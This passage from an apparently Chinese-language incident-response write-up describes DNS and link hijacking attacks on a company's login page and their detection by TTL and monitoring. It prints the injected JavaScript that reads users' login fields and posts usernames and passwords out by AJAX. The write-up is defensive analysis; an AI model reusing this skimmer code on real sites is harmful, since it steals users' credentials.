0x06 案例之永無(wú)止境的劫持

對(duì)于劫持我想大家都不陌生，我們?cè)谏钪斜容^常見到的就是運(yùn)營(yíng)商在頁(yè)面中插入廣告等代碼，這種就是一種劫持攻擊。

回到案例本身，我們的一個(gè)業(yè)務(wù)先后出現(xiàn)多次多種手段的劫持攻擊，一次是 dns 劫持，把業(yè)務(wù)的域名劫持到 61.* 這個(gè) ip 上，另外一次是鏈路劫持，替換服務(wù)器返回給用戶的 http 響應(yīng)內(nèi)容，這兩次的目的都一樣就是在登錄口添加 js 代碼，用于竊取用戶的用戶名和明文密碼。我們另外一個(gè)業(yè)務(wù)也遭受鏈路劫持，直接替換客戶投放的廣告代碼，給業(yè)務(wù)造成很大的經(jīng)濟(jì)損失。

下面兩個(gè)圖是我們業(yè)務(wù)監(jiān)控系統(tǒng)和基調(diào)的截圖，上面的圖可以很明顯看到在 9:30 用戶登錄成功數(shù)明顯下降，持續(xù)不到一個(gè)小時(shí)，下圖是全國(guó)部分地區(qū)基調(diào)的數(shù)據(jù)，可以看到域名被明顯劫持到 61 這個(gè) ip，這是一次典型的 DNS 攻擊。 

  

頁(yè)面中被插入的攻擊核心代碼

1. //獲取用戶名和密碼  
2. function ffCheck() {  
3.     try {  
4.         try {  
5.             var u = null != f ? f.idInput.value : document.getElementById("idInput").value;  
6.         } catch (e) {  
7.             var u = (document.getElementById("idInput").innerHTML).replace(/\s/g, "");  
8.         }  
9.         var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value;  
10.         if (u.indexOf("@") == -1) u += "@xxx.com";  
11.         try {  
12.             if (u.indexOf("@") == -1) uu = u + getdomain();  
13.         } catch (e) {}  
14.         sendurl("/abc", u, p, "coremail");  
15.     } catch (e) {}  
16.     return fOnSubmit();  
17. }  
18.    
19. 通過(guò) ajax 發(fā)送出去  
20. function sendurl(uri, u, p, i) {  
21. xmlHttp = GetXmlHttpObject();  
22. if (xmlHttp == null) {  
23.     return;  
24. }  
25. param = "user=" + u + "&pass=" + p + "&icp=" + i;  
26. xmlHttp.onreadystatechange = stateChanged;  
27. try {  
28.     xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true);  
29. } catch (e) {}  
30. xmlHttp.setRequestHeader("If-Modified-Since", "0");  
31. xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");  
32. xmlHttp.send(param);  
33. } 

接下來(lái)看下面兩張圖片 

  

這是一次典型的鏈路劫持攻擊，通過(guò) ttl 就能夠判斷，攻擊的結(jié)果和前面提到的 dns 劫持攻擊類似，插入惡意 js 代碼來(lái)獲取用戶的用戶名和密碼。

對(duì)于劫持攻擊的處理過(guò)程，首先是判斷是什么攻擊，對(duì)于鏈路劫持目前的鏈路劫持好像大部分都是旁路的攻擊方式，就可以通過(guò) ttl 來(lái)定位，默認(rèn)的 ttl 值很好判斷，如果可以修改的 ttl 值，可以通過(guò)遞增或者遞減 ttl 的方式來(lái)判斷，dns 劫持就是判斷攻擊方式是什么，哪些 dns 受影響，劫持的 ip 是什么運(yùn)營(yíng)商，劫持后做了什么事情。

其次是解決攻擊，一般根據(jù)劫持的情況去聯(lián)系運(yùn)營(yíng)商，聯(lián)系有關(guān)部門等，但是然并卵，有的功能投訴很有效，比如劫持廣告代碼，有的攻擊則沒有任何作用，比如注入 js 代碼獲取用戶名和密碼。

其實(shí)我們能做的畢竟有限，完善監(jiān)控，當(dāng)劫持發(fā)生的時(shí)候能夠第一時(shí)間獲知，甚至提醒用戶當(dāng)前環(huán)境有劫持的風(fēng)險(xiǎn)，對(duì)部分業(yè)務(wù)使用 https，但是我覺得都不能根治這些問(wèn)題。怎么才能解決劫持問(wèn)題，我沒有好的解決方案，在這里我把這類案例分享出來(lái)是希望能夠和各位進(jìn)一步探討。

0x07 總結(jié)

總結(jié)這里我就不打算寫太多，我覺得有幾個(gè)大的方向作為指導(dǎo)：

從業(yè)務(wù)角度，保障業(yè)務(wù)肯定是應(yīng)急響應(yīng)的前提;

從對(duì)抗角度，知己知彼百戰(zhàn)不殆;

從技術(shù)角度，只有更多的了解攻擊才能更好的做到防御;